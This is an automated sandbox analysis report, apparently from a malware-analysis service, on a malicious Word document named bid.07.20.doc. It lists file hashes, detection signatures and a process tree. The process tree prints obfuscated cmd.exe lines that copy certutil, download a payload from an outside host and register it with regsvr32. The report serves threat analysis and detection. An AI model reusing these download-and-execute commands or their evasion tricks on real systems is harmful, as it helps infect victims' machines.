Analysis

  • max time kernel
    60s
  • max time network
    43s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    03-08-2020 20:04

General

  • Target

    bid.07.20.doc

  • Size

    110KB

  • MD5

    df1c3c76ae77a9c9e14e642e211e1cdf

  • SHA1

    012dcfc2876916eaf12c1356e5fe893c7d155c70

  • SHA256

    a01810ab151d6b800e1b6d9c692485fe5c6462d7c6900b197cebd19a3c7a154f

  • SHA512

    7bf330e64225a6294b3085fdc435478c5405f2c4379ceca4e285e319288091a7cd72ea688ff944414cbc62ef28240a9a05b4bb202fce1fe9959e7de1898ab1dd

Score
10/10

Malware Config

Signatures

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bid.07.20.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1060
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
      2⤵
      • Process spawned unexpected child process
      PID:304
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://vkr0bt.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Process spawned unexpected child process
      PID:840

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads